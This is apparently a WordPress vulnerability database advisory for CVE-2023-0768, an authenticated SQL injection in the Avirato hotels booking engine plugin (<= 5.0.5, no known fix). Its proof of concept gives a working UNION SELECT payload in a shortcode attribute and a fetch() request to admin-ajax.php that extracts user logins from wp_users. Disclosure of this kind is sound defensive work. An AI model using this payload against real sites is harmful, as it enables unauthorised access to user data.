WordPress Plugin Vulnerabilities

Avirato hotels online booking engine <= 5.0.5 - Subscriber+ SQLi

Description

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.

Proof of Concept

[Calendario_Avirato id="1 UNION SELECT user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users"] on a post (with at least Contributor role), or using the following fetch command with a Subscriber role:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[Calendario_Avirato id=\"1 UNION SELECT user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users WHERE ID = 1\"]",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Note: COLLATE was used because of the character encoding of the database.

Affects Plugins

Plugin icon
avirato-calendar
No known fix

References

CVE
CVE-2023-0768

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
03d061b4-1b71-44f5-b3dc-f82a5fcd92eb

Timeline

Publicly Published
2023-04-17 (about 1 years ago)
Added
2023-04-17 (about 1 years ago)
Last Updated
2023-04-17 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
WPtouch 1.9.8 - include/submit.php Multiple Parameter SQL Injection
Published
2023-04-06
Title
Transbank Webpay REST < 1.6.7 - Admin+ SQLi
Published
2024-05-01
Title
WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting < 1.13.2 - Authenticated (AccountingManager+) SQL Injection
Published
2014-08-01
Title
Events Calendar - SQL Injection
Published
2023-12-28
Title
WS Form LITE < 1.9.171 - Authenticated(Administrator+) SQL Injection